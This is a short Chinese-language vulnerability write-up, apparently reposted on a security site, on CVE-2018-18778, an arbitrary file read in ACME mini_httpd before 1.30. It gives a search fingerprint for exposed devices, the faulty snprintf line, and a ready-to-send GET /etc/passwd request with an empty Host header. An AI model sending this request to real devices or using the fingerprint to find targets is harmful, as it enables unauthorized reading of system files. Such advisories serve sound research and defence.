ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778

admin 2022年7月17日03:05:35安全漏洞评论1 views843字阅读2分48秒阅读模式

1.漏洞描述

漏洞原因是由于没有过滤Http包头的特定字段,导致可以构造访问系统文件

的路径,从而导致可访问任意文件,攻击者可以利用该漏洞读取设备的任意文件,这将严重威胁采用Mini_httpd的设备的安全性

2.漏洞影响范围

ACME mini_httpd before 1.30

3. 网络测绘

app="ACME-mini_httpd"

4. 漏洞复现

指纹信息

ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778

在mini_httpd开启虚拟主机模式的情况下,用户请求`http://HOST/FILE`将会访问到当前目录下的HOST/FILE文件。

当`HOST=example.com、FILE=index.html`的时候,上述语句结果为`exam

ple.com/index.html`,文件正常读取。


当`HOST为空、FILE=etc/passwd`的时候,上述语句结果为`/etc/passwd`。

(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname

, f );

发送请求包,置空host

GET /etc/passwd HTTP/1.1
Host:
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6


Content-Length: 0
Referer: http://192.168.0.144:8080/

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36


x-requested-with: XMLHttpRequest
ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778


 


 



原文始发于微信公众号(红豆芷浠):ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月17日03:05:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778 http://cn-sec.com/archives/1181114.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: